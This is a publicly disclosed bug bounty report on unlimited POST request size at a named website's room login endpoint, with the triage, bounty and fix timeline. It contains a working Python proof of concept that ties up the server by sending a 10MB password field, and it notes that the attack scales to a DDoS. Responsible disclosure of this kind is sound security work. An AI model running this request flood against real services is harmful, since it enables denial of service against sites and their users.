Unrestricted POST request size on roomlogin endpoint
State Resolved (Closed)
Disclosed publicly 2018-10-07T14:55:42.685Z
Reported To
Weakness Denial of Service
Bounty $200
Collapse


Timeline
submitted a report to Chaturbate .
2018-10-03T14:45:32.783Z

POST requests to endpoint /roomlogin/<user> are not limited in size. While the main website login endpoint correctly limits the size of request, this endpoint does not. This can be a mean to perform a DOS attack.

Steps To Reproduce:

  1. <user> has a password-protected stream.
  2. Send a large POST request to /roomlogin/<user> (e.g., a really long password).

Expected behaviour

HTTP error 413 is promptly returned.

Actual behaviour

Server reads and processes the whole request, consuming long amounts of time.

POC

This Python snippet can reproduce the issue. A ~10MB request consumes about 30 seconds of server time. I did not proceed further to avoid disrupting the service and because this attack which can be easily parallelized has itself a pretty serious impact.

import requests
url = "https://it.chaturbate.com/roomlogin/█████/"
csrf = "███████"

password_size = 10 * 1000 * 1000
payload = {'password': 'a' * password_size, 'next': '/████/', 'csrfmiddlewaretoken' : csrf}

s = requests.Session()
s.headers.update({'referer': url})
s.cookies.set("csrftoken", csrf)
s.cookies.set("sessionid", "█████████")
r = s.post(url, data=payload)

print r.elapsed
0:00:40.249484

Suggested resolution steps

  • Put a reasonable low limit to request size, as it already happens with main login.
  • (Optional) Limit the max-size of input element #id_password to 64 characters.

Impact

DOS of the main website. The attack can be easily parallelized, leading to potentially severe DDOS.

Regards,
Frans

  • 0 attachments:
lucach Activities::Comment
2018-10-03T16:25:29.869Z
(Human Augmented Signal) I confirm that the report is reproducible (POC attached), has a security impact and is in scope (targets main website).


williammmllc Activities::ReportSeverityUpdated
2018-10-05T00:58:49.546Z


williammmllc Activities::BugTriaged
2018-10-05T01:00:06.294Z
Thanks for the report. The login length is limited to prevent a ddos on the hash function, however this doesn't apply for the room login. However we will limit the submit size.


Activities::BountyAwarded
2018-10-05T01:00:17.058Z


lucach Activities::Comment
2018-10-05T11:39:05.530Z
I perfectly understand the difference between login- and room- passwords, but the significant processing time of such a request still looks pretty worrisome. Thanks for the bounty and the quick response.


williammmllc Activities::BugResolved
2018-10-05T21:48:57.700Z
Thanks for the report. This should now be limited to 1MB, can you confirm?


lucach Activities::Comment
2018-10-06T15:02:25.921Z
I can confirm, now the longest request cannot take more than a bunch of seconds of server time, which is a reasonable limit. Well done and congratulations for the quickness of the process!


williammmllc Activities::AgreedOnGoingPublic
2018-10-07T00:19:02.590Z
Thanks for the confirm!


lucach Activities::AgreedOnGoingPublic
2018-10-07T14:55:42.629Z


lucach Activities::ReportBecamePublic
2018-10-07T14:55:42.720Z